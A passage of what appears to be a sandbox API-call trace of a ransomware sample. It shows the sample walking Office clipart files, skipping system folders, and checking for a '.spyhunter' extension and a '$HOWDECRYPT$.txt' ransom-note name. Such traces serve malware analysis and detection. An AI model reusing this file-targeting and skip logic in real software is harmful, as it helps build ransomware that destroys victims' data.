pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF") returned 67 [0098.251] StrStrIW (lpFirst="J0107308.WMF", lpSrch=".spyhunter") returned 0x0 [0098.252] lstrcmpW (lpString1="J0107308.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.252] lstrcmpW (lpString1="J0107308.WMF", lpString2="_uninstalling_.png") returned 1 [0098.252] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF") returned 67 [0098.252] GetProcessHeap () returned 0x2c0000 [0098.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1ece0 [0098.252] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2630) returned 0x2c16890 [0098.252] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.252] lstrcmpiW (lpString1="J0107314.WMF", lpString2="Windows") returned -1 [0098.252] lstrlenW (lpString="Windows") returned 7 [0098.252] lstrcmpiW (lpString1="J0107314.WMF", lpString2="$Recycle.bin") returned 1 [0098.252] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.252] lstrcmpiW (lpString1="J0107314.WMF", lpString2="System Volume Information") returned -1 [0098.252] lstrlenW (lpString="System Volume Information") returned 25 [0098.252] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF") returned 67 [0098.252] StrStrIW (lpFirst="J0107314.WMF", lpSrch=".spyhunter") returned 0x0 [0098.252] lstrcmpW (lpString1="J0107314.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.252] lstrcmpW (lpString1="J0107314.WMF", lpString2="_uninstalling_.png") returned 1 [0098.252] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF") returned 67 [0098.252] GetProcessHeap () returned 0x2c0000 [0098.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1edb0 [0098.253] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2638) returned 0x2c16890 [0098.253] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.260] lstrcmpiW (lpString1="J0107316.WMF", lpString2="Windows") returned -1 [0098.260] lstrlenW (lpString="Windows") returned 7 [0098.260] lstrcmpiW (lpString1="J0107316.WMF", lpString2="$Recycle.bin") returned 1 [0098.260] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.260] lstrcmpiW (lpString1="J0107316.WMF", lpString2="System Volume Information") returned -1 [0098.260] lstrlenW (lpString="System Volume Information") returned 25 [0098.260] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107316.WMF") returned 67 [0098.260] StrStrIW (lpFirst="J0107316.WMF", lpSrch=".spyhunter") returned 0x0 [0098.260] lstrcmpW (lpString1="J0107316.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.260] lstrcmpW (lpString1="J0107316.WMF", lpString2="_uninstalling_.png") returned 1 [0098.260] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107316.WMF") returned 67 [0098.260] GetProcessHeap () returned 0x2c0000 [0098.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1ee80 [0098.260] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2640) returned 0x2c16890 [0098.261] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.261] lstrcmpiW (lpString1="J0107328.WMF", lpString2="Windows") returned -1 [0098.261] lstrlenW (lpString="Windows") returned 7 [0098.261] lstrcmpiW (lpString1="J0107328.WMF", lpString2="$Recycle.bin") returned 1 [0098.261] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.261] lstrcmpiW (lpString1="J0107328.WMF", lpString2="System Volume Information") returned -1 [0098.261] lstrlenW (lpString="System Volume Information") returned 25 [0098.261] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107328.WMF") returned 67 [0098.261] StrStrIW (lpFirst="J0107328.WMF", lpSrch=".spyhunter") returned 0x0 [0098.261] lstrcmpW (lpString1="J0107328.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.261] lstrcmpW (lpString1="J0107328.WMF", lpString2="_uninstalling_.png") returned 1 [0098.261] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107328.WMF") returned 67 [0098.261] GetProcessHeap () returned 0x2c0000 [0098.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1ef50 [0098.261] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2648) returned 0x2c16890 [0098.261] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.262] lstrcmpiW (lpString1="J0107342.WMF", lpString2="Windows") returned -1 [0098.262] lstrlenW (lpString="Windows") returned 7 [0098.262] lstrcmpiW (lpString1="J0107342.WMF", lpString2="$Recycle.bin") returned 1 [0098.262] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.262] lstrcmpiW (lpString1="J0107342.WMF", lpString2="System Volume Information") returned -1 [0098.262] lstrlenW (lpString="System Volume Information") returned 25 [0098.262] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107342.WMF") returned 67 [0098.262] StrStrIW (lpFirst="J0107342.WMF", lpSrch=".spyhunter") returned 0x0 [0098.262] lstrcmpW (lpString1="J0107342.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.262] lstrcmpW (lpString1="J0107342.WMF", lpString2="_uninstalling_.png") returned 1 [0098.262] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107342.WMF") returned 67 [0098.262] GetProcessHeap () returned 0x2c0000 [0098.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1f020 [0098.262] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2650) returned 0x2c16890 [0098.262] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.262] lstrcmpiW (lpString1="J0107344.WMF", lpString2="Windows") returned -1 [0098.262] lstrlenW (lpString="Windows") returned 7 [0098.262] lstrcmpiW (lpString1="J0107344.WMF", lpString2="$Recycle.bin") returned 1 [0098.262] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.262] lstrcmpiW (lpString1="J0107344.WMF", lpString2="System Volume Information") returned -1 [0098.262] lstrlenW (lpString="System Volume Information") returned 25 [0098.262] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107344.WMF") returned 67 [0098.263] StrStrIW (lpFirst="J0107344.WMF", lpSrch=".spyhunter") returned 0x0 [0098.263] lstrcmpW (lpString1="J0107344.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.263] lstrcmpW (lpString1="J0107344.WMF", lpString2="_uninstalling_.png") returned 1 [0098.263] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107344.WMF") returned 67 [0098.263] GetProcessHeap () returned 0x2c0000 [0098.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1f0f0 [0098.263] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2658) returned 0x2c16890 [0098.263] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.263] lstrcmpiW (lpString1="J0107350.WMF", lpString2="Windows") returned -1 [0098.263] lstrlenW (lpString="Windows") returned 7 [0098.263] lstrcmpiW (lpString1="J0107350.WMF", lpString2="$Recycle.bin") returned 1 [0098.263] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.263] lstrcmpiW (lpString1="J0107350.WMF", lpString2="System Volume Information") returned -1 [0098.263] lstrlenW (lpString="System Volume Information") returned 25 [0098.263] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107350.WMF") returned 67 [0098.263] StrStrIW (lpFirst="J0107350.WMF", lpSrch=".spyhunter") returned 0x0 [0098.263] lstrcmpW (lpString1="J0107350.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.263] lstrcmpW (lpString1="J0107350.WMF", lpString2="_uninstalling_.png") returned 1 [0098.263] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107350.WMF") returned 67 [0098.263] GetProcessHeap () returned 0x2c0000 [0098.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1f1c0 [0098.264] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2660) returned 0x2c16890 [0098.264] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.264] lstrcmpiW (lpString1="J0107358.WMF", lpString2="Windows") returned -1 [0098.264] lstrlenW (lpString="Windows") returned 7 [0098.264] lstrcmpiW (lpString1="J0107358.WMF", lpString2="$Recycle.bin") returned 1 [0098.264] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.264] lstrcmpiW (lpString1="J0107358.WMF", lpString2="System Volume Information") returned -1 [0098.264] lstrlenW (lpString="System Volume Information") returned 25 [0098.264] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107358.WMF") returned 67 [0098.264] StrStrIW (lpFirst="J0107358.WMF", lpSrch=".spyhunter") returned 0x0 [0098.264] lstrcmpW (lpString1="J0107358.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.264] lstrcmpW (lpString1="J0107358.WMF", lpString2="_uninstalling_.png") returned 1 [0098.264] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107358.WMF") returned 67 [0098.264] GetProcessHeap () returned 0x2c0000 [0098.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1f290 [0098.264] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2668) returned 0x2c16890 [0098.264] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.264] lstrcmpiW (lpString1="J0107364.WMF", lpString2="Windows") returned -1 [0098.265] lstrlenW (lpString="Windows") returned 7 [0098.265] lstrcmpiW (lpString1="J0107364.WMF", lpString2="$Recycle.bin") returned 1 [0098.265] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.265] lstrcmpiW (lpString1="J0107364.WMF", lpString2="System Volume Information") returned -1 [0098.265] lstrlenW (lpString="System Volume Information") returned 25 [0098.265] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107364.WMF") returned 67 [0098.265] StrStrIW (lpFirst="J0107364.WMF", lpSrch=".spyhunter") returned 0x0 [0098.265] lstrcmpW (lpString1="J0107364.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.265] lstrcmpW (lpString1="J0107364.WMF", lpString2="_uninstalling_.png") returned 1 [0098.265] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107364.WMF") returned 67 [0098.265] GetProcessHeap () returned 0x2c0000 [0098.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1f360 [0098.265] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2670) returned 0x2c16890 [0098.265] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.265] lstrcmpiW (lpString1="J0107426.WMF", lpString2="Windows") returned -1 [0098.265] lstrlenW (lpString="Windows") returned 7 [0098.265] lstrcmpiW (lpString1="J0107426.WMF", lpString2="$Recycle.bin") returned 1 [0098.265] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.265] lstrcmpiW (lpString1="J0107426.WMF", lpString2="System Volume Information") returned -1 [0098.265] lstrlenW (lpString="System Volume Information") returned 25 [0098.265] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107426.WMF") returned 67 [0098.266] StrStrIW (lpFirst="J0107426.WMF", lpSrch=".spyhunter") returned 0x0 [0098.266] lstrcmpW (lpString1="J0107426.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.266] lstrcmpW (lpString1="J0107426.WMF", lpString2="_uninstalling_.png") returned 1 [0098.266] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107426.WMF") returned 67 [0098.266] GetProcessHeap () returned 0x2c0000 [0098.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1f430 [0098.266] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2678) returned 0x2c16890 [0098.266] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.266] lstrcmpiW (lpString1="J0107446.WMF", lpString2="Windows") returned -1 [0098.266] lstrlenW (lpString="Windows") returned 7 [0098.266] lstrcmpiW (lpString1="J0107446.WMF", lpString2="$Recycle.bin") returned 1 [0098.266] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.266] lstrcmpiW (lpString1="J0107446.WMF", lpString2="System Volume Information") returned -1 [0098.266] lstrlenW (lpString="System Volume Information") returned 25 [0098.266] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107446.WMF") returned 67 [0098.266] StrStrIW (lpFirst="J0107446.WMF", lpSrch=".spyhunter") returned 0x0 [0098.266] lstrcmpW (lpString1="J0107446.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.266] lstrcmpW (lpString1="J0107446.WMF", lpString2="_uninstalling_.png") returned 1 [0098.266] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107446.WMF") returned 67 [0098.266] GetProcessHeap () returned 0x2c0000 [0098.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1f500 [0098.267] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2680) returned 0x2c16890 [0098.270] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.270] lstrcmpiW (lpString1="J0107450.WMF", lpString2="Windows") returned -1 [0098.277] lstrlenW (lpString="Windows") returned 7 [0098.277] lstrcmpiW (lpString1="J0107450.WMF", lpString2="$Recycle.bin") returned 1 [0098.277] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.277] lstrcmpiW (lpString1="J0107450.WMF", lpString2="System Volume Information") returned -1 [0098.277] lstrlenW (lpString="System Volume Information") returned 25 [0098.278] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107450.WMF") returned 67 [0098.278] StrStrIW (lpFirst="J0107450.WMF", lpSrch=".spyhunter") returned 0x0 [0098.278] lstrcmpW (lpString1="J0107450.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.278] lstrcmpW (lpString1="J0107450.WMF", lpString2="_uninstalling_.png") returned 1 [0098.278] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107450.WMF") returned 67 [0098.278] GetProcessHeap () returned 0x2c0000 [0098.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c312d8 [0098.278] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2678) returned 0x2c16890 [0098.278] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.278] lstrcmpiW (lpString1="J0107452.WMF", lpString2="Windows") returned -1 [0098.278] lstrlenW (lpString="Windows") returned 7 [0098.278] lstrcmpiW (lpString1="J0107452.WMF", lpString2="$Recycle.bin") returned 1 [0098.278] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.278] lstrcmpiW (lpString1="J0107452.WMF", lpString2="System Volume Information") returned -1 [0098.278] lstrlenW (lpString="System Volume Information") returned 25 [0098.278] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107452.WMF") returned 67 [0098.278] StrStrIW (lpFirst="J0107452.WMF", lpSrch=".spyhunter") returned 0x0 [0098.278] lstrcmpW (lpString1="J0107452.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.278] lstrcmpW (lpString1="J0107452.WMF", lpString2="_uninstalling_.png") returned 1 [0098.278] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107452.WMF") returned 67 [0098.279] GetProcessHeap () returned 0x2c0000 [0098.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1f5d0 [0098.279] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2680) returned 0x2c16890 [0098.279] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.279] lstrcmpiW (lpString1="J0107456.WMF", lpString2="Windows") returned -1 [0098.279] lstrlenW (lpString="Windows") returned 7 [0098.279] lstrcmpiW (lpString1="J0107456.WMF", lpString2="$Recycle.bin") returned 1 [0098.279] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.279] lstrcmpiW (lpString1="J0107456.WMF", lpString2="System Volume Information") returned -1 [0098.279] lstrlenW (lpString="System Volume Information") returned 25 [0098.279] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107456.WMF") returned 67 [0098.279] StrStrIW (lpFirst="J0107456.WMF", lpSrch=".spyhunter") returned 0x0 [0098.279] lstrcmpW (lpString1="J0107456.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.279] lstrcmpW (lpString1="J0107456.WMF", lpString2="_uninstalling_.png") returned 1 [0098.279] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107456.WMF") returned 67 [0098.279] GetProcessHeap () returned 0x2c0000 [0098.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1f6a0 [0098.279] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2688) returned 0x2c16890 [0098.279] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.279] lstrcmpiW (lpString1="J0107458.WMF", lpString2="Windows") returned -1 [0098.279] lstrlenW (lpString="Windows") returned 7 [0098.280] lstrcmpiW (lpString1="J0107458.WMF", lpString2="$Recycle.bin") returned 1 [0098.280] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.280] lstrcmpiW (lpString1="J0107458.WMF", lpString2="System Volume Information") returned -1 [0098.280] lstrlenW (lpString="System Volume Information") returned 25 [0098.280] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107458.WMF") returned 67 [0098.280] StrStrIW (lpFirst="J0107458.WMF", lpSrch=".spyhunter") returned 0x0 [0098.280] lstrcmpW (lpString1="J0107458.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.280] lstrcmpW (lpString1="J0107458.WMF", lpString2="_uninstalling_.png") returned 1 [0098.280] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107458.WMF") returned 67 [0098.280] GetProcessHeap () returned 0x2c0000 [0098.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1f770 [0098.280] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2690) returned 0x2c16890 [0098.281] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.281] lstrcmpiW (lpString1="J0107468.WMF", lpString2="Windows") returned -1 [0098.282] lstrlenW (lpString="Windows") returned 7 [0098.282] lstrcmpiW (lpString1="J0107468.WMF", lpString2="$Recycle.bin") returned 1 [0098.282] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.282] lstrcmpiW (lpString1="J0107468.WMF", lpString2="System Volume Information") returned -1 [0098.282] lstrlenW (lpString="System Volume Information") returned 25 [0098.282] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107468.WMF") returned 67 [0098.282] StrStrIW (lpFirst="J0107468.WMF", lpSrch=".spyhunter") returned 0x0 [0098.282] lstrcmpW (lpString1="J0107468.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.282] lstrcmpW (lpString1="J0107468.WMF", lpString2="_uninstalling_.png") returned 1 [0098.282] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107468.WMF") returned 67 [0098.282] GetProcessHeap () returned 0x2c0000 [0098.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1f840 [0098.282] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2698) returned 0x2c16890 [0098.282] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.282] lstrcmpiW (lpString1="J0107480.WMF", lpString2="Windows") returned -1 [0098.282] lstrlenW (lpString="Windows") returned 7 [0098.282] lstrcmpiW (lpString1="J0107480.WMF", lpString2="$Recycle.bin") returned 1 [0098.282] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.282] lstrcmpiW (lpString1="J0107480.WMF", lpString2="System Volume Information") returned -1 [0098.282] lstrlenW (lpString="System Volume Information") returned 25 [0098.282] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107480.WMF") returned 67 [0098.283] StrStrIW (lpFirst="J0107480.WMF", lpSrch=".spyhunter") returned 0x0 [0098.283] lstrcmpW (lpString1="J0107480.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.283] lstrcmpW (lpString1="J0107480.WMF", lpString2="_uninstalling_.png") returned 1 [0098.283] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107480.WMF") returned 67 [0098.283] GetProcessHeap () returned 0x2c0000 [0098.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1f910 [0098.283] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x26a0) returned 0x2c16890 [0098.283] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.283] lstrcmpiW (lpString1="J0107482.WMF", lpString2="Windows") returned -1 [0098.283] lstrlenW (lpString="Windows") returned 7 [0098.288] lstrcmpiW (lpString1="J0107482.WMF", lpString2="$Recycle.bin") returned 1 [0098.288] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.288] lstrcmpiW (lpString1="J0107482.WMF", lpString2="System Volume Information") returned -1 [0098.288] lstrlenW (lpString="System Volume Information") returned 25 [0098.288] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107482.WMF") returned 67 [0098.288] StrStrIW (lpFirst="J0107482.WMF", lpSrch=".spyhunter") returned 0x0 [0098.288] lstrcmpW (lpString1="J0107482.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.288] lstrcmpW (lpString1="J0107482.WMF", lpString2="_uninstalling_.png") returned 1 [0098.288] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107482.WMF") returned 67 [0098.288] GetProcessHeap () returned 0x2c0000 [0098.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1f430 [0098.288] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x26a0) returned 0x2c16890 [0098.289] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.289] lstrcmpiW (lpString1="J0107484.WMF", lpString2="Windows") returned -1 [0098.289] lstrlenW (lpString="Windows") returned 7 [0098.289] lstrcmpiW (lpString1="J0107484.WMF", lpString2="$Recycle.bin") returned 1 [0098.289] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.289] lstrcmpiW (lpString1="J0107484.WMF", lpString2="System Volume Information") returned -1 [0098.289] lstrlenW (lpString="System Volume Information") returned 25 [0098.289] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107484.WMF") returned 67 [0098.289] StrStrIW (lpFirst="J0107484.WMF", lpSrch=".spyhunter") returned 0x0 [0098.289] lstrcmpW (lpString1="J0107484.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.289] lstrcmpW (lpString1="J0107484.WMF", lpString2="_uninstalling_.png") returned 1 [0098.289] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107484.WMF") returned 67 [0098.289] GetProcessHeap () returned 0x2c0000 [0098.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1f9e0 [0098.289] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x26a8) returned 0x2c16890 [0098.289] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.289] lstrcmpiW (lpString1="J0107488.WMF", lpString2="Windows") returned -1 [0098.289] lstrlenW (lpString="Windows") returned 7 [0098.289] lstrcmpiW (lpString1="J0107488.WMF", lpString2="$Recycle.bin") returned 1 [0098.289] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.289] lstrcmpiW (lpString1="J0107488.WMF", lpString2="System Volume Information") returned -1 [0098.290] lstrlenW (lpString="System Volume Information") returned 25 [0098.290] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107488.WMF") returned 67 [0098.290] StrStrIW (lpFirst="J0107488.WMF", lpSrch=".spyhunter") returned 0x0 [0098.290] lstrcmpW (lpString1="J0107488.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.290] lstrcmpW (lpString1="J0107488.WMF", lpString2="_uninstalling_.png") returned 1 [0098.290] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107488.WMF") returned 67 [0098.290] GetProcessHeap () returned 